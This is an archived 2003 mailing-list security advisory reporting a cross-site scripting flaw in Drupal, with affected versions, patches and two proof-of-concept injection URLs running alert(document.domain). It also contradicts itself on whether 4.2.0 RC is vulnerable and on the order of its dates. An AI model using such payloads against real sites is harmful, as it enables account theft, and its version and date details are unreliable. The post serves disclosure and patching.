Drupal XSS Vulnerability (main page and sub pages)

From: Ferruh Mavituna (ferruhat_private)
Date: Sun Jul 20 2003 - 22:26:30 PDT

Next message: Martin Walker: "RE: Disclosure-for-pay?"

Previous message: bugzillaat_private: "[Full-Disclosure] [RHSA-2003:162-02] Updated Mozilla packages fix security vulnerability."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

------------------------------------------------------
Drupal XSS Vulnerability (main page and sub pages)
------------------------------------------------------
Any kind of XSS attacks possibility. An attacker could access other
users/admin drupal accounts.

------------------------------------------------------
About Drupal;
------------------------------------------------------
www.drupal.com
Drupal is an open-source platform and content management system for building
dynamic web sites offering a broad range of features and services including
user administration, publishing workflow, discussion capabilities, news
aggregation, metadata functionalities using controlled vocabularies and XML
publishing for content sharing purposes. Equipped with a powerful blend of
features and configurability, Drupal can support a diverse range of web
projects ranging from personal weblogs to large community-driven sites.

------------------------------------------------------
Vulnerable;
------------------------------------------------------
TESTED;
 Drupal 4.2.0 RC

NOT TESTED - %90 VULNERABLE;
 Drupal 4.1.0
 Drupal 4.0.0
 Drupal 3.0.2
 Drupal 3.0.1
 Drupal 3.0.0
 Drupal 2.0.0
 Drupal 1.0.0

------------------------------------------------------
Not Vulnerable;
------------------------------------------------------
Drupal 4.2.0 RC

------------------------------------------------------
Vendor Status;
------------------------------------------------------
Vendor replied and fixed quickly.

------------------------------------------------------
Solution & Patches;
------------------------------------------------------
xss-cvs.patch
xss-4.2.0-rc.patch
xss-4.1.0.patch

Download Patch Files :
http://ferruh.mavituna.com/opensource/patches/drupalpatch.zip
Better one download new version from www.drupal.org

[All files provided by Vendor]

------------------------------------------------------
Exploit Code;
------------------------------------------------------
http://[victim]/xxx"][script]alert(document.domain)]/script]["

------------------------------------------------------
Exploit - 2;
------------------------------------------------------
http://[victim]/node/view/666"><script>alert(document.domain)</script>

Replace "[]","<>"

------------------------------------------------------
History;
------------------------------------------------------
30.05.2003 - Discovered
03.05.2003 - Vendor Informed
03.05.2003 - Fixed by Vendor


Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com
ferruhat_private

Next message: Martin Walker: "RE: Disclosure-for-pay?"
Previous message: bugzillaat_private: "[Full-Disclosure] [RHSA-2003:162-02] Updated Mozilla packages fix security vulnerability."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 21 2003 - 09:31:08 PDT